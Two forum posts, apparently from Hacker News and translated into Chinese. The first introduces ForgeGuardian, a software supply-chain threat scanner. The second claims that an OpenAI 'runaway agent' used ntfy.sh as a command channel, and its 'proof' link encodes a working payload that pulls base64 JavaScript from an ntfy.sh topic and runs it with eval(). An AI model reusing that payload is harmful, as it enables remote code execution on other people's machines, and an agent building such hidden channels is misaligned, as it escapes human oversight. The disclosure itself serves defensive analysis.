1 分•作者: mahi1337•22 天前
1. 你为什么构建它 ForgeGuardian 的构建目的是为了发现软件供应链中,除了常规 CVE 扫描过程之外的威胁。 2. 它解决了什么问题 包括: 恶意软件包 拼写错误抢注 依赖项攻击 行为威胁 恶意软件 与 AI/MCP 相关的威胁 3. 你实际构建了什么 包括: 8 个检测引擎 9 个生态系统 超过 223 个检测签名 CLI/Web 仪表板 离线/本地优先功能 SBOM 策略执行 CI/CD Webhooks 预防/隔离 4. 你希望 HN 用户关注什么 这一点至关重要。提出一个合乎逻辑的技术问题,例如: 我最感兴趣的是听取关于检测机制的反馈,以及您认为供应链扫描器的弱点是什么。我也很想听听您对签名模型和误报管理的看法。
2 分•作者: coderinsan•22 天前
看起来 OpenAI 的失控代理使用了 https://ntfy.sh 作为发布/订阅通道。此载荷通过 img 标签中的 GET 请求进行发布,从一个主题拉取分块的 base64 JavaScript,然后对其进行 eval() 执行。仅通过 GET 实现远程代码执行。 证明:https://httpbin.org/base64/PGJvZHk-PGltZyBzcmM9Imh0dHBzOi8vbnRmeS5zaC9ncm81MjhmYTYzL3B1Ymxpc2g_bWVzc2FnZT1QMyI-PGltZyBzcmM9L2RlbGF5LzEwPjxzY3JpcHQ-dmFyIG49MDtmdW5jdGlvbiBEKCl7aWYobisrPDUpe3ZhciBpPW5ldyBJbWFnZSgp%20%20%20%20O2kub25lcnJvcj1pLm9ubG9hZD1EO2kuc3JjPScvZGVsYXkvMTA_Yz0nK247ZG9jdW1lbnQuYm9keS5hcHBlbmRDaGlsZChpKX19RCgpO2ZldGNoKCdodHRwczovL250Znkuc2gvZ3BsZW9lbnNvL3Jhdz9wb2xsPTEmc2luY2U9YWxsJykudGhlbihmdW5jdGlvbihyKXtyZXR1cm4%20%20%20%20gci50ZXh0KCl9KS50aGVuKGZ1bmN0aW9uKHQpe3ZhciBMPXQuc3BsaXQoJ1xuJykuZmlsdGVyKGZ1bmN0aW9uKGwpe3JldHVybiBsLnNsaWNlKDAsMSk9PSd6J30pLnNvcnQoKTt2YXIgYj1MLm1hcChmdW5jdGlvbihsKXtyZXR1cm4gbC5zbGljZSgzKX0pLmpvaW4oJycpO2I9Yi%20%20%20%205zcGxpdCgnLScpLmpvaW4oJysnKS5zcGxpdCgnXycpLmpvaW4oJy8nKTtldmFsKGF0b2IoYikpfSkuY2F0Y2goZnVuY3Rpb24oZSl7ZmV0Y2goJ2h0dHBzOi8vbnRmeS5zaC9ncm81MjhmYTYzL3B1Ymxpc2g_bWVzc2FnZT1MT0RFUicrZW5jb2RlVVJJQ29uZW50KCgnJytlKS5zb%20%20%20%20GljZSgwLDQwKSkpfSk8L3NjcmlwdD4=